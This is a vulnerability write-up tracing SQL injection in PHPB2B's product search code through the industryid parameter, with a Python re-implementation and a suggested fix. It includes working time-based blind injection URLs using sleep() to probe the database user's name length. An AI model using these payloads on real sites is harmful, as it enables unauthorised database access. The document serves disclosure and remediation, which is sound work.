SQL injection somewhere in PHPB2B (#3)

Date: 2015-1-28    Author: admin    Category: Technical exchange





Affects the latest version from the official site.



libraries/core/controllers/product_controller.php



Lines 176-187:

Code:
function lists()
{
        global $pos, $viewhelper;
        $viewhelper->setPosition(L("product_center", 'tpl'), 'index.php?do=product');
        $viewhelper->setTitle(L("product_center", 'tpl'));
        setvar("module", "product");
        $this->product->initSearch();   // builds the WHERE conditions from $_GET
        $result = $this->product->Search($pos, $this->displaypg);
        setvar("items", $result);
        $this->view->assign("total_count", $this->product->amount);
        render("product/list");
}



This calls the function product->initSearch(). Following it in:



libraries/core/models/product_controller.php

Code:
function initSearch()
{
        uses("industry","area");
        $this->area = new Areas();
        $this->industry = new Industries();
        $this->condition[] = "Product.status=1 ";
        if (isset($_GET['industryid'])) {
                if (strpos($_GET['industryid'], ",")!==false) {
                        // comma present: the raw GET value is pasted into the IN list
                        $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";
                }else{
                        $industryid = intval($_GET['industryid']);
                        $sub_ids = $this->industry->getSubDatas($industryid);
                        $sub_ids = array_keys($sub_ids);
                        $sub_ids = array_filter($sub_ids);
                        $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";
                }
        }
        if (isset($_GET['areaid'])) {
                if (strpos($_GET['areaid'], ",")!==false) {
                        // identical pattern to the industryid comma branch
                        $this->condition[]= "Product.area_id IN (".trim($_GET['areaid']).")";
                }else{
                        $areaid = intval($_GET['areaid']);
                        $this->condition[]= "Product.area_id='".$areaid."'";
                }
        }
        if (isset($_GET['type'])) {
                if($_GET['type']=="commend"){
                        $this->condition[] = "Product.if_commend='1'";
                }
        }
        if (!empty($_GET['typeid'])) {
                // quoted, but nothing in this function escapes it
                $this->condition[] = "Product.sort_id='".$_GET['typeid']."'";
        }
        if(!empty($_GET['q'])) {
                // strip_tags() removes HTML tags, not quotes
                $searchkeywords = strip_tags($_GET['q']);
                $this->condition[]= "Product.name like '%".$searchkeywords."%'";
        }
        if (isset($_GET['pubdate'])) {
                switch ($_GET['pubdate']) {
                        case "l3":
                                $this->condition[] = "Product.created>".($this->timestamp-3*86400);
                                break;
                        case "l10":
                                $this->condition[] = "Product.created>".($this->timestamp-10*86400);
                                break;
                        case "l30":
                                $this->condition[] = "Product.created>".($this->timestamp-30*86400);
                                break;
                        default:
                                break;
                }
        }
        if (!empty($_GET['total_count'])) {
                $this->amount = intval($_GET['total_count']);
        }else{
                $this->amount = $this->findCount();
        }
        if (!empty($_GET['orderby'])) {
                switch ($_GET['orderby']) {
                        case "dateline":
                                $this->orderby = "created DESC";
                                break;
                        default:
                                break;
                }
        }
}



The code follows the same pattern throughout (the areaid comma branch is identical), so we look at just one spot:

Code:
if (isset($_GET['industryid'])) {
        if (strpos($_GET['industryid'], ",")!==false) {
                $this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";
        }else{
                $industryid = intval($_GET['industryid']);
                $sub_ids = $this->industry->getSubDatas($industryid);
                $sub_ids = array_keys($sub_ids);
                $sub_ids = array_filter($sub_ids);
                $this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";
        }
}



If the supplied industryid contains a comma, the value is only trim()-ed and then concatenated straight into the condition array: no integer cast (the intval() of the single-id branch is skipped) and no single quotes around it. Everything after "IN (" is therefore attacker-controlled SQL text.
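To make the failure concrete, here is the comma branch re-implemented in Python next to a hardened version. This is an added example, not PHPB2B code: the vulnerable function mirrors the PHP line above, the safe function parses every token as an integer and binds the values as query parameters, and the in-memory Product table with its rows is constructed test data (sqlite3 stands in for MySQL, so no sleep()/user() here).

```python
"""
Added example (not PHPB2B code): the comma branch of initSearch() in Python,
beside a hardened version that validates each id and binds it as a parameter.
The Product table and rows below are constructed test data.
"""
import re
import sqlite3
from typing import List, Tuple


def industry_condition_vulnerable(industryid: str) -> str:
    """Mirror of the PHP: a comma is present, trim() strips whitespace, and the
    raw value is pasted into the IN (...) list. No intval(), no quoting."""
    if "," not in industryid:
        raise ValueError("only the comma branch is modelled here")
    return "Product.industry_id IN (" + industryid.strip() + ")"


def industry_condition_safe(industryid: str) -> Tuple[str, List[int]]:
    """Hardened form: every comma-separated token must be a plain decimal
    integer, and the values travel as bound parameters, not as SQL text."""
    ids = []
    for token in industryid.split(","):
        token = token.strip()
        if not re.fullmatch(r"[0-9]{1,10}", token):
            raise ValueError("industryid must be a comma-separated list of integers, got %r" % token)
        ids.append(int(token))
    placeholders = ",".join("?" for _ in ids)
    return "Product.industry_id IN (" + placeholders + ")", ids


def is_accepted(industryid: str) -> bool:
    """True if the hardened parser accepts the value (handy for tests)."""
    try:
        industry_condition_safe(industryid)
        return True
    except ValueError:
        return False


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory Product table with a handful of rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Product (id INTEGER, name TEXT, industry_id INTEGER, status INTEGER)")
    db.executemany("INSERT INTO Product VALUES (?,?,?,?)", [
        (1, "bolt", 1, 1), (2, "nut", 234, 1), (3, "gear", 234, 0), (4, "belt", 7, 1)])
    return db


def search_products(db: sqlite3.Connection, industryid: str) -> List[str]:
    """Run the safe condition through a real query. The status=1 condition is
    the one initSearch() adds first; the AND join is an assumption."""
    fragment, params = industry_condition_safe(industryid)
    sql = "SELECT name FROM Product WHERE Product.status=1 AND " + fragment + " ORDER BY name"
    return [row[0] for row in db.execute(sql, params)]


if __name__ == "__main__":
    print(industry_condition_vulnerable("1,234)||if((length(user())=0),sleep(30),0)#"))
    print(search_products(demo_db(), "1, 234"))
```

The equivalent one-line fix in the PHP itself is to apply the cast the single-id branch already uses to every element, e.g. `implode(",", array_map('intval', explode(",", $_GET['industryid'])))`, which turns the payload above into `1,234` and nothing else.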

Next, back in libraries/core/models/product_controller.php, the call

$result = $this->product->Search($pos, $this->displaypg);

executes the search.

Inside it there is another pile of concatenation and conversion, but none of it touches our fragment. We go straight to the SQL statement that finally runs.



Visit:

Code:
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=0),sleep(30),0)%23

[screenshot: 1.png]



So it is injectable. The `)` closes the IN list, `||` ORs in the conditional sleep(), and `%23` (`#`) comments out the rest of the statement.

localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>10),sleep(30),0)%23

Delays.

localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>15),sleep(30),0)%23

No delay.

localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=14),sleep(30),0)%23

Delays.

So user() is 14 characters long.



No further demonstration here; the rest is left as an exercise, heh.

Tags: injection, PHPB2B